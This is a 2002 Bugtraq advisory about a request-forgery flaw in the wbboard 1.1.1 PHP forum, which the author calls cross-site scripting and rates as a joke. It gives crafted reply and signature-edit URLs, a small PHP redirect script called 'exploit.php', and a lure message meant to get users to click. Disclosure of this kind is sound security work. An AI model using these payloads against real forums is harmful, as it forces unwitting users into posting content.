[25067] in bugtraq
wbboard 1.1.1 Cross Site Scripting Vulnerability
daemon@ATHENA.MIT.EDU (SeazoN)
Mon Apr 15 20:41:38 2002
Date: Sat, 13 Apr 2002 17:48:55 +0300
From: SeazoN <seazon@dnestr.com>
Reply-To: SeazoN <seazon@dnestr.com>
Message-ID: <18129850505.20020413174855@dnestr.com>
To: bugtraq@securityfocus.com
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
wbboard 1.1.1 Cross Site Scripting Vulnerability
- -------------------------
Affected program : wbboard 1.1.1 is a phpBB-like PHP forum
Vendor : http://www.woltlab.de/
Vulnerability-Class : Cross Site Scripting (CSS)
OS specific : No
Problem-Type : Joke
severity : No risk
SUMMARY
1.WBBoard allowed to post messages like this:
http://localhost/wbboard/reply.php?threadid=7&boardid=58&action=send&subject=check%20this%20out&message=test[IMG]http://localhost/~seazon/art/eros/236.jpg[/IMG]&signature=1
2. allowed to edit signature like this:
http://localhost/wbboard/profile.php?mode=editsignature&send=1$preview=0&message=Take%20a%20deep%20breath,%20relax%20[IMG]http://localhost/~seazon/art/eros/236.jpg[/IMG]
IMPACT
User clicked on this link force posted your message in forum :)
EXPLOIT
1. Create a script exploit.php
exploit.php // with php U can dynamicaly redirect to the same treads & boardid (parsing $HTTP_REFERER)
<?php
header ("Location: http://localhost/wbboard/reply.php?threadid=7&boardid=58&action=send&subject=check%20this%20out&message=test[IMG]http://localhost/~seazon/art/eros/236.jpg[/IMG]&signature=1"); /* Redirect browser*/
?>
2.Register in forum
3.Send a message like this
"Hey, I know how to exploit this forum [URL]http://host.com/exploit.php[/URL]"
SOLUTION
I dont think what it is necessary.
P.S. : I think what all main forums is exploitable for this way.
For phpBB you must use HTTP POST method
